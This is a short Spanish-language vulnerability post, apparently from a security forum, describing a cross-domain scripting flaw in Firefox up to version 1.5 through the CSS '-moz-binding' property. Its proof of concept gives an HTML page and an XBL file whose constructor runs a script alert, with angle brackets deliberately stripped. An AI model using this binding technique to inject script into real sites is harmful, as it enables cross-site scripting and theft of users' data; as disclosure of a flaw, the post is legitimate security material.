Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vuln.

Mozilla Firefox hasta la version 1.5, es propenso a una vulnerabilidad de la seguridad que pueda dejar una página del Web ejecutar código malévolo en el contexto de un dominio arbitrario.
La edición afectada es la propiedad '-moz-binding' .
Esto podía permitir que un sitio malévolo tenga acceso a las características de un sitio y facilite varios ataques incluyendo acceso de la información sensible de dicho sitio.

Prueba de Concepto:

creamo la pagina

http://dominio1/path/to/pagina.html

con el siguiente contenido:

html>
head>
style>
body { -moz-binding: url("http://dominio2/path/to/xbl.xml#xss"); }
/style>
/head>
body>
/body>
/html>

donde en:

http://dominio2/path/to/xbl.xml

debe contener:


?xml version="1.0"?>
bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

binding id="xss">
implementation>
constructor>
alert("XBL XSS");
/constructor>
/implementation>
/binding>

/bindings>

Referencia

Saludos

Nota: agregar los ¨<->¨ correpondientes en cada linea.